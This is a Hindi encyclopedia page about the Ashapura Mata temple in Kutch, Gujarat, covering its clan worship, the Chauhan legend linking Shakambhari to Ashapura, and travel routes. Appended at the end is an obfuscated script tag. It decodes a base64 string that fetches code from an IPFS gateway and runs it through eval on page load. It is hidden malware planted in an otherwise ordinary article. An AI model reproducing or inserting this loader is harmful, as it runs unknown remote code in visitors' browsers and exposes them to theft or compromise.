आशापुरा माता मन्दिर, गुजरात

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
Disamb2.jpg आशापुरा माता मन्दिर एक बहुविकल्पी शब्द है अन्य अर्थों के लिए देखें:- आशापुरा माता मन्दिर (बहुविकल्पी)

आशापुरा माता का मन्दिर गुजरात के कच्छ में स्थित प्रसिद्ध हिन्दू धार्मिक स्थल है। मुख्‍य रूप से कच्छ में यहां की कुल देवी माता आशापुरा का पीठ है। आशापुरा माता को कई समुदाय अपनी कुलदेवी के रूप में मानते हैं। इनमें से मुख्‍य रूप से नवानगर, राजकोट, मोरवी, गोंडल बारिया राज्य के शासक वंश, चौहान और जडेजा राजपूत शामिल हैं। गुजरात में आशापुरा माता का मुख्य मंदिर कच्‍छ में 'माता नो मढ़', जो भुज में है, से लगभग 95 किलोमीटर दूर स्थित है। कच्‍छ के गोसर और पोलादिया समुदाय के लोग भी आशापुरा माता को अपनी कुलदेवी मानते हैं।

ऐतिहासिक कथा

बताया जाता है कि चौहान वंश की स्थापना के बाद में शुरू से शाकम्भरी देवी को कुलदेवी के रूप में पूजा जाता रहा है। चौहान वंश का राज्य शाकम्भर यानि सांभर में स्थापित हुआ। तब से ही चौहानों ने मां आद्यशक्ति को शाकम्भरी के रूप में स्‍वीकार करके शक्‍ति की पूजा अर्चना शुरू कर दी थी। इसके बाद नाडोल में भी राव लक्ष्मण ने शाकम्भरी माता के रूप में ही माता की आराधना प्रारंभ थी, लेकिन जब देवी के आशीर्वाद फलस्वरूप उनकी सभी आशाएं पूर्ण होने लगीं तो उन्‍होंने माता को आशापुरा मतलब 'आशा पूरी करने वाली' कहकर संबोधित करना प्रारंभ किया। इस तरह से माता शाकम्भरी का ही एक और नाम आशापुरा विख्यात हुआ और कालांतर में चौहान वंश के लोग माता शाकम्भरी को ही आशापुरा माता के नाम से कुलदेवी मानने लगे।

कैसे पहुंचें

माता आशापुरा के दर्शन के लिए अजमेर-अहमदाबाद रेलमार्ग पर पड़ने वाले रानी रेल स्टेशन पर उतरकर बस व टैक्सी से नाडोल जाया जा सकते हैं। इसके अतिरिक्‍त कच्छ पहुंच कर भी सड़क मार्ग से आशापुरा माता के मंदिर जा सकते हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>